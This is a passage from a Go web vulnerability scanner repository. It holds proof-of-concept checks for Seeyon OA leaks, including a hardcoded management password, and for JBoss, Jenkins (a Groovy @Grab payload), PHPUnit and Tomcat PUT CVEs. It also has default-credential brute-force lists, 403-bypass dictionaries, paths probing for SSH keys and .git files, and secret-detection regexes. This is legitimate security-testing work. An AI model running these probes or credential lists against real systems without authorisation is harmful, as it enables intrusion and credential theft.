-------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // createMysql.jsp 数据库敏感信息泄 9 | 10 | func CreateMysql(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/yyoa/createMysql.jsp", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "root") { 13 | return true 14 | } 15 | } 16 | if req, err := client.Request(u+"/yyoa/ext/createMysql.jsp", "GET", "", nil); err == nil { 17 | if req.StatusCode == 200 && strings.Contains(req.Body, "root") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/DownExcelBeanServlet.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import "github.com/yhy0/Jie/pkg/protocols/httpx" 4 | 5 | // DownExcelBeanServlet 用户敏感信息泄露 6 | 7 | func DownExcelBeanServlet(u string, client *httpx.Client) bool { 8 | if req, err := client.Request(u+"/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", "GET", "", nil); err == nil { 9 | if req.StatusCode == 200 && req.Header.Get("Content-disposition") != "" { 10 | return true 11 | } 12 | } 13 | return false 14 | } 15 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/GetSessionList.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // getSessionList.jsp session 泄露 9 | 10 | func GetSessionList(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/yyoa/ext/https/getSessionList.jsp?cmd=getAll", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "sessionID") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/InitDataAssess.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // initDataAssess.jsp 用户敏感信息泄露 9 | 10 | func InitDataAssess(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/yyoa/assess/js/initDataAssess.jsp", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "personList") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/ManagementStatus.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // A8 状态监控页面信息泄露 9 | 10 | func ManagementStatus(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/seeyon/management/index.jsp", "POST", "password=WLCCYBD@SEEYON", nil); err == nil { 12 | if req.StatusCode == 302 && strings.Contains(req.Location, "status") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/sql.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | //'A6 test.jsp SQL注入漏洞' 4 | //'A6 setextno.jsp SQL注入漏洞' 5 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/jboss/CVE_2017_12149.go: -------------------------------------------------------------------------------- 1 | package jboss 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | ) 6 | 7 | func CVE_2017_12149(url string, client *httpx.Client) bool { 8 | if req, err := client.Request(url+"/invoker/readonly", "GET", "", nil); err == nil { 9 | if req.StatusCode == 500 { 10 | return true 11 | } 12 | } 13 | return false 14 | } 15 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/jenkins/CVE_2018_1000110.go: -------------------------------------------------------------------------------- 1 | package jenkins 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | func CVE_2018_1000110(u string, client *httpx.Client) bool { 9 | if req, err := client.Request(u, "GET", "", nil); err == nil { 10 | if req.Header.Get("X-Jenkins-Session") != "" { 11 | if req2, err := client.Request(u+"/search/?q=a", "GET", "", nil); err == nil { 12 | if strings.Contains(req2.Body, "Search for 'a'") { 13 | return true 14 | } 15 | } 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/jenkins/CVE_2019_1003000.go: -------------------------------------------------------------------------------- 1 | package jenkins 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | func CVE_2019_10003000(u string, client *httpx.Client) bool { 9 | if req, err := client.Request(u, "GET", "", nil); err == nil { 10 | if req.Header.Get("X-Jenkins-Session") != "" { 11 | if req2, err := client.Request(u+"/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27vtest%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vtestvul%27,%20version=%271%27)%0aimport%20Vtest;", "GET", "", nil); err == nil { 12 | if strings.Contains(req2.Body, "package#vtestvul") { 13 | return true 14 | } 15 | } 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/phpunit/CVE_2017_9841.go: -------------------------------------------------------------------------------- 1 | package phpunit 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | func CVE_2017_9841(url string, client *httpx.Client) bool { 9 | if req, err := client.Request(url+"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "POST", "", nil); err == nil { 10 | if req.StatusCode == 200 && strings.Contains(req.Body, "PHP Version") { 11 | return true 12 | } 13 | } 14 | return false 15 | } 16 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/tomcat/CVE_2017_12615.go: -------------------------------------------------------------------------------- 1 | package tomcat 2 | 3 | import "github.com/yhy0/Jie/pkg/protocols/httpx" 4 | 5 | func CVE_2017_12615(url string, client *httpx.Client) bool { 6 | if req, err := client.Request(url+"/vtset.txt", "PUT", "test", nil); err == nil { 7 | if req.StatusCode == 204 || req.StatusCode == 201 { 8 | return true 9 | } 10 | } 11 | return false 12 | } 13 | -------------------------------------------------------------------------------- /scan/bbscan/README.md: -------------------------------------------------------------------------------- 1 | ## [BBscan](https://github.com/lijiejie/bbscan) 2 | 3 | 规则含义 4 | 5 | - status 状态码 6 | - type 返回包 Content-Type 格式 7 | - type_no 返回包 Content-Type 格式不包括 8 | - tag 返回包内容匹配 9 | - root_only 只有主目录下才会存在该路径 10 | - fingprints 网站的指纹, 多种形式以 , 分割 表示或 11 | 12 | -------------------------------------------------------------------------------- /scan/bbscan/bbscan_test.go: -------------------------------------------------------------------------------- 1 | package bbscan 2 | 3 | import ( 4 | "fmt" 5 | "testing" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2024/4/26 11 | @desc //TODO 12 | **/ 13 | 14 | func TestBBscan(t *testing.T) { 15 | fmt.Println(Rules["/util/exec_sh?filePath=1"]) 16 | } 17 | -------------------------------------------------------------------------------- /scan/bbscan/dicts.go: -------------------------------------------------------------------------------- 1 | package bbscan 2 | 3 | import ( 4 | "embed" 5 | _ "embed" 6 | ) 7 | 8 | //go:embed rules/** 9 | var rulesFiles embed.FS 10 | -------------------------------------------------------------------------------- /scan/bbscan/rules/dangerous_directory.txt: -------------------------------------------------------------------------------- 1 | # https://2015.zeronights.org/assets/files/35-Egorov.pdf webdav -> xxe 2 | /webdav {status=200} 3 | /nacos {status=200} {type="html"} {tag="nacos"} {root_only} 4 | /Dockerfile {status=200} {tag="docker"} 5 | /oauth/idp/.well-known/openid-configuration {status=200} {root_only} 6 | # 有两种情况 7 | /jmreport/testConnection {status=405} {type="html"} {tag="type=Method Not Allowed"} {root_only} 8 | /jmreport/testConnection {status=200} {type="application/json"} {tag="不支持GET请求方法"} {root_only} 9 | 10 | /webservice/ {status=200} {type="html"} {tag="Available SOAP services:"} 11 | -------------------------------------------------------------------------------- /scan/bbscan/rules/druid.txt: -------------------------------------------------------------------------------- 1 | # Druid 2 | /druid/websession.html {status=200} {type="html"} {tag="session"} {root_only} 3 | /system/druid/websession.html {status=200} {type="html"} {tag="session"} {root_only} 4 | /webpage/system/druid/websession.html(jeecg) {status=200} {type="html"} {tag="session"} {root_only} 5 | 6 | /druid/login.html {status=200} {type="html"} {tag="login"} {root_only} 7 | /system/druid/index.html {status=200} {type="html"} {tag="login"} {root_only} 8 | /webpage/system/druid/login.html {status=200} {type="html"} {tag="login"} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/git_and_svn.txt: -------------------------------------------------------------------------------- 1 | # SVN and Git 2 | /.svn/entries {status=200} {tag="-props"} 3 | /.svn/all-wcprops {status=200} {tag="svn:wc:ra_dav:version-url"} 4 | /.git/config {status=200} {tag="[core]"} 5 | /.git/index {status=200} {tag="DIRC"} 6 | /.git/HEAD {status=200} {tag="refs/heads/"} 7 | /.gitlab-ci.yml {status=200} {tag="stage"} -------------------------------------------------------------------------------- /scan/bbscan/rules/go_pprof_debug.txt: -------------------------------------------------------------------------------- 1 | # add golang pprof 2 | /debug/pprof/goroutine?debug=1 {status=200} {type="text/plain"} {tag="goroutine profile"} 3 | /pprof/goroutine?debug=1 {status=200} {type="text/plain"} {tag="goroutine profile"} 4 | -------------------------------------------------------------------------------- /scan/bbscan/rules/java_server_faces2.txt: -------------------------------------------------------------------------------- 1 | /javax.faces.resource.../WEB-INF/web.xml.jsf {status=200} {type="xml"} {tag="APC INFO"} {fingprints="php"} -------------------------------------------------------------------------------- /scan/bbscan/rules/phpmyadmin.txt: -------------------------------------------------------------------------------- 1 | /phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only} {fingprints="php"} 2 | /phpMyAdmin/index.php {tag="<title>phpMyAdmin"} {status=200} {root_only} {fingprints="php"} 3 | /_phpmyadmin/index.php {tag="<title>phpMyAdmin"} {status=200} {root_only} {fingprints="php"} 4 | /pma/index.php {tag="<title>phpMyAdmin"} {status=200} {root_only} {fingprints="php"} -------------------------------------------------------------------------------- /scan/bbscan/rules/resin_admin.txt: -------------------------------------------------------------------------------- 1 | # Resin Doc 2 | /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile {tag="/etc/profile.d/*.sh"} {root_only} 3 | # /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp {tag="This is the default start page for the Resin server"} {root_only} 4 | /resin-admin/ {status=200} {tag="<title>Resin Admin Login for"} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/safetyEquipment.txt: -------------------------------------------------------------------------------- 1 | # 安全设备 2 | /fort/pages/login.jsp {status=200} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/shell_script_disclosure.txt: -------------------------------------------------------------------------------- 1 | /install.sh {status=206} {root_only} {tag='#!/'} {type="text"} 2 | /deploy.sh {status=206} {root_only} {tag='#!/'} {type="text"} 3 | /upload.sh {status=206} {root_only} {tag='#!/'} {type="text"} 4 | /setup.sh {status=206} {root_only} {tag='#!/'} {type="text"} 5 | /backup.sh {status=206} {root_only} {tag='#!/'} {type="text"} 6 | /rsync.sh {status=206} {root_only} {tag='#!/'} {type="text"} 7 | /sync.sh {status=206} {root_only} {tag='#!/'} {type="text"} 8 | /test.sh {status=206} {root_only} {tag='#!/'} {type="text"} 9 | /run.sh {status=206} {root_only} {tag='#!/'} {type="text"} -------------------------------------------------------------------------------- /scan/bbscan/rules/ssh_sensitive_file.txt: -------------------------------------------------------------------------------- 1 | # SSH 2 | 3 | /.ssh/known_hosts {status=206} {type="application/octet-stream"} {root_only} 4 | /.ssh/id_rsa {status=200} {tag="PRIVATE KEY-"} {root_only} 5 | /id_rsa {status=200} {tag="PRIVATE KEY-"} {root_only} 6 | /.ssh/id_rsa.pub {status=200} {tag="ssh-rsa"} {root_only} 7 | /.ssh/id_dsa {status=200} {tag="PRIVATE KEY-"} {root_only} 8 | /id_dsa {status=200} {tag="PRIVATE KEY-"} {root_only} 9 | /.ssh/id_dsa.pub {status=200} {tag="ssh-dss"} {root_only} 10 | /.ssh/authorized_keys {status=200} {tag="ssh-rsa"} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/test_page.txt: -------------------------------------------------------------------------------- 1 | /test.php {status=200} {type="html"} {root_only} 2 | /test2.php {status=200} {type="html"} {root_only} 3 | # /test.html {status=200} {type="html"} {root_only} 4 | # /test2.html {status=200} {type="html"} {root_only} 5 | /test.jsp {status=200} {type="html"} {root_only} 6 | /test.txt {status=200} {type="text/plain"} {root_only} 7 | /test2.txt {status=200} {type="text/plain"} {root_only} 8 | /debug.php {status=200} {type="html"} {root_only} {fingprints="php"} 9 | /a.php {status=200} {type="html"} {root_only} {fingprints="php"} 10 | /1.php {status=200} {type="html"} {root_only} {fingprints="php"} 11 | -------------------------------------------------------------------------------- /scan/bbscan/rules/tomcat_manager.txt: -------------------------------------------------------------------------------- 1 | # Tomcat Examples 2 | # /examples/ {status=200} {type="html"} {tag="<TITLE>Apache Tomcat Examples"} {root_only} 3 | # /examples/servlets/servlet/SessionExample {status=200} {type="html"} {tag="Sessions Example"} {root_only} 4 | /manager/html {status=401} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/web_editors.txt: -------------------------------------------------------------------------------- 1 | # Web Editors 2 | /fckeditor/_samples/default.html {tag="FCKeditor"} {type="html"} 3 | /ckeditor/samples/ {tag="<title>CKEditor Samples"} 4 | /editor/ckeditor/samples/ {tag="CKEditor Samples"} 5 | /ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com"} 6 | /editor/ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com"} 7 | # /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php {status=200} {type="html"} {tag="init_spell()"} 8 | # /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php {status=200} {type="html"} {tag="init_spell()"} 9 | 10 | 11 | # ueditor SSRF 12 | 13 | /ueditor/ueditor.all.js {status=200} {tag="UE.version"} 14 | /ueditor/php/getRemoteImage.php {tag="'tip':'"} {status=200} 15 | -------------------------------------------------------------------------------- /scan/gadget/README.md: -------------------------------------------------------------------------------- 1 | ## gadget 2 | 3 | 一些信息收集、扫描的小工具 -------------------------------------------------------------------------------- /scan/gadget/brute/dicts.go: -------------------------------------------------------------------------------- 1 | package brute 2 | 3 | import ( 4 | _ "embed" 5 | "github.com/yhy0/Jie/pkg/util" 6 | ) 7 | 8 | var ( 9 | tomcatuserpass = []util.UserPass{} 10 | jbossuserpass = []util.UserPass{} 11 | top100pass = []string{} 12 | weblogicuserpass = []util.UserPass{} 13 | ) 14 | 15 | //go:embed dicts/tomcatuserpass.txt 16 | var szTomcatuserpass string 17 | 18 | //go:embed dicts/jbossuserpass.txt 19 | var szJbossuserpass string 20 | 21 | //go:embed dicts/weblogicuserpass.txt 22 | var szWeblogicuserpass string 23 | 24 | //go:embed dicts/top100pass.txt 25 | var szTop100pass string 26 | 27 | func init() { 28 | tomcatuserpass = util.CvtUps(szTomcatuserpass) 29 | jbossuserpass = util.CvtUps(szJbossuserpass) 30 | weblogicuserpass = util.CvtUps(szWeblogicuserpass) 31 | top100pass = append(top100pass, util.CvtLines(szTop100pass)...) 32 | } 33 | -------------------------------------------------------------------------------- /scan/gadget/brute/dicts/jbossuserpass.txt: -------------------------------------------------------------------------------- 1 | jboss,jboss 2 | admin,admin 3 | jboss,123456 4 | admin,123456 5 | -------------------------------------------------------------------------------- /scan/gadget/brute/dicts/weblogicuserpass.txt: -------------------------------------------------------------------------------- 1 | weblogic,weblogic 2 | weblogic,welcome1 3 | weblogic,Oracle@123 4 | weblogic,123456 5 | weblogic,weblogic123 6 | system,password 7 | guest,guest 8 | portaladmin,portaladmin 9 | admin,security 10 | joe,password 11 | mary,password 12 | system,security 13 | wlcsystem,wlcsystem 14 | wlcsystem,sipisystem -------------------------------------------------------------------------------- /scan/gadget/brute/hydra/util.go: -------------------------------------------------------------------------------- 1 | package hydra 2 | 3 | import "strings" 4 | 5 | /** 6 | @author: yhy 7 | @since: 2023/6/1 8 | @desc: //TODO 9 | **/ 10 | 11 | func CheckErrs(err error) bool { 12 | if err == nil { 13 | return false 14 | } 15 | errs := []string{ 16 | "closed by the remote host", "too many connections", 17 | "i/o timeout", "EOF", "A connection attempt failed", 18 | "established connection failed", "connection attempt failed", 19 | "Unable to read", "is not allowed to connect to this", 20 | "no pg_hba.conf entry", 21 | "No connection could be made", 22 | "invalid packet size", 23 | "bad connection", 24 | } 25 | for _, key := range errs { 26 | if strings.Contains(strings.ToLower(err.Error()), strings.ToLower(key)) { 27 | return true 28 | } 29 | } 30 | return false 31 | } 32 | -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/endpaths.txt: -------------------------------------------------------------------------------- 1 | ? 2 | ?? 3 | / 4 | // 5 | /. 6 | /./ 7 | /..;/ 8 | ..\;/ 9 | ..;/ 10 | ~ 11 | °/ 12 | # 13 | #/ 14 | #/./ 15 | #test 16 | %00 17 | %09 18 | %0A 19 | %0D 20 | %20 21 | %20/ 22 | %25 23 | %23 24 | %26 25 | %3f 26 | %61 27 | & 28 | - 29 | . 30 | ..; 31 | ..\; 32 | ./ 33 | .css 34 | .html 35 | .json 36 | .php 37 | .random 38 | .svc 39 | .svc?wsdl 40 | .wsdl 41 | / 42 | // 43 | 0 44 | 1 45 | ? 46 | ?? 47 | ??? 48 | ?WSDL 49 | ?debug=1 50 | ?debug=true 51 | ?param 52 | ?testparam 53 | \/\/ 54 | debug 55 | false 56 | null 57 | true 58 | ~ 59 | /..%3B/ 60 | /* 61 | -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/headers.txt: -------------------------------------------------------------------------------- 1 | Access-Control-Allow-Origin 2 | Base-Url 3 | CF-Connecting-IP 4 | CF-Connecting_IP 5 | Client-IP 6 | Destination 7 | Forwarded 8 | Forwarded-For 9 | Forwarded-For-Ip 10 | Host 11 | Http-Url 12 | Origin 13 | Profile 14 | Proxy 15 | Proxy-Host 16 | Proxy-Url 17 | Real-Ip 18 | Redirect 19 | Referer 20 | Referrer 21 | Request-Uri 22 | True-Client-IP 23 | Uri 24 | Url 25 | X-Arbitrary 26 | X-Client-IP 27 | X-Custom-IP-Authorization 28 | X-Forward 29 | X-Forward-For 30 | X-Forwarded 31 | X-Forwarded-By 32 | X-Forwarded-For 33 | X-Forwarded-For-Original 34 | X-Forwarded-Host 35 | X-Forwarded-Proto 36 | X-Forwarded-Server 37 | X-Forwarder-For 38 | X-Host 39 | X-HTTP-DestinationURL 40 | X-HTTP-Host-Override 41 | X-Original-Remote-Addr 42 | X-Original-URL 43 | X-Originally-Forwarded-For 44 | X-Originating-IP 45 | X-Proxy-Url 46 | X-ProxyUser-Ip 47 | X-Real-IP 48 | X-Referrer 49 | X-Remote-Addr 50 | X-Remote-IP 51 | X-Rewrite-URL 52 | X-WAP-Profile 53 | X-Real-Ip 54 | X-True-IP -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/httpmethods.txt: -------------------------------------------------------------------------------- 1 | CONNECT 2 | COPY 3 | DELETE 4 | GET 5 | HEAD 6 | LABEL 7 | LOCK 8 | MOVE 9 | OPTIONS 10 | PATCH 11 | POST 12 | POUET 13 | PUT 14 | TRACE 15 | TRACK 16 | UNCHECKOUT 17 | UPDATE 18 | VERSION-CONTROL -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/ips.txt: -------------------------------------------------------------------------------- 1 | * 2 | 0 3 | 0.0.0.0 4 | 0177.0000.0000.0001 5 | 0177.1 6 | 0x7F000001 7 | 10.0.0.0 8 | 10.0.0.1 9 | 127.0.0.1 10 | 127.0.0.1:443 11 | 127.0.0.1:80 12 | 127.1 13 | 172.16.0.0 14 | 172.16.0.1 15 | 172.17.0.1 16 | 192.168.0.2 17 | 192.168.1.0 18 | 192.168.1.1 19 | 2130706433 20 | 8.8.8.8 21 | localhost 22 | localhost:443 23 | localhost:80 24 | norealhost 25 | null -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/simpleheaders.txt: -------------------------------------------------------------------------------- 1 | Referer /admin 2 | X-HTTP-Method-Override POST 3 | X-HTTP-Method-Override PUT 4 | X-Original-URL /admin 5 | X-Override-URL /admin 6 | X-Rewrite-URL /admin 7 | X-Forwarded-Port 80 8 | X-Forwarded-Port 443 9 | X-Forwarded-Port 4443 10 | X-Forwarded-Port 8080 11 | X-Forwarded-Port 8443 -------------------------------------------------------------------------------- /scan/gadget/collection/README.md: -------------------------------------------------------------------------------- 1 | ## 信息收集 2 | 3 | 提取自 https://github.com/pingc0y/URLFinder 4 | https://github.com/momosecurity/FindSomething 5 | 6 | - 域名 7 | - ip 8 | - 邮箱 9 | - 手机 10 | - 身份证 11 | - API -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/adafruit-key.yaml: -------------------------------------------------------------------------------- 1 | id: adafruit-key 2 | 3 | info: 4 | name: Adafruit API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go 10 | metadata: 11 | verified: true 12 | tags: adafruit,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100e18e66c25918d1d8e980ab39a1d206e65dc34ef8b6ae0e043c87d34f0496d4260220651cd87fb75b897e27766f354e0711534ef67b6f368885d00fbf79ed44ed72a7:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/adobe/adobe-client.yaml: -------------------------------------------------------------------------------- 1 | id: adobe-client 2 | 3 | info: 4 | name: Adobe Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,adobe,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 490a00463044022007eda94aded10055c992548f92f163ce142cfa63312df87ab1913d55655c84a402205cfb63b7803c40be56e370f98a2541ef20c37455b0b0f136a5c19164ee802429:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/age/age-identity-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: age-identity-secret-key 2 | 3 | info: 4 | name: Age Identity (X22519 secret key) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml 9 | - https://github.com/FiloSottile/age/blob/main/doc/age.1.html 10 | - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type 11 | metadata: 12 | verified: true 13 | tags: file,keys,age-encryption,token 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' 24 | # digest: 4a0a00473045022100967a33608a1ecaa232719a64590ae179e82473d9ff9960e1294033f41dcfafb3022011659ec4586dff37d9381700897e858d37c2b363d718315d96fa9db721bc7123:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/age/age-recipient-public-key.yaml: -------------------------------------------------------------------------------- 1 | id: age-recipient-public-key 2 | 3 | info: 4 | name: Age Recipient (X25519 public key) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml 9 | - https://github.com/FiloSottile/age/blob/main/doc/age.1.html 10 | - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type 11 | metadata: 12 | verified: true 13 | tags: file,keys,age-encryption,token 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - '\bage1[0-9a-z]{58}\b' 24 | # digest: 4b0a004830460221008efb372243352ac7767832750aa04221c747bfb407e0d3599f6716055832807402210084c3968cf28f080a9a1ef95e6cd8a9029e85c7fa0d051df56217ecc16d6aafb9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/airtable-key.yaml: -------------------------------------------------------------------------------- 1 | id: airtable-key 2 | 3 | info: 4 | name: Airtable API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,airtable,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 490a004630440220673067de4dbbe1d9d4f9337d2eddd6903ed401646b5e2ef23b4cb4fbc15e4bb40220774a7aafc56f3023bd7d681d429badb45d714352a8fcb74844e5913b116cfce2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/algolia-key.yaml: -------------------------------------------------------------------------------- 1 | id: algolia-key 2 | 3 | info: 4 | name: Algolia API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go 10 | metadata: 11 | verified: true 12 | tags: algolia,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a0047304502200114ce7db1c3fde42b20020e1d0ccddb88507568c665f21e1cdc8a7b722defdb022100c707d824ef36106683f16cc962e32ac899c727c5b22db59a7af8a4ab957a27d6:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/alibaba/alibaba-key-id.yaml: -------------------------------------------------------------------------------- 1 | id: alibaba-key-id 2 | 3 | info: 4 | name: Alibaba Access Key ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go 10 | metadata: 11 | verified: true 12 | tags: alibaba,access,file,keys 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 490a0046304402202a929c5a7c56fdcba6baf8a05f5ee26de1dc68039a330a33dba7e6973876605b0220499fe8d24c2d03e30f7ffa4077775380ea6b237262bfdc1319821135d3bf0faf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/alibaba/alibaba-secret-id.yaml: -------------------------------------------------------------------------------- 1 | id: alibaba-secret-id 2 | 3 | info: 4 | name: Alibaba Secret Key ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go 10 | metadata: 11 | verified: true 12 | tags: alibaba,secret,file,keys 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:alibaba)(?:[0-9a-z\-_\t 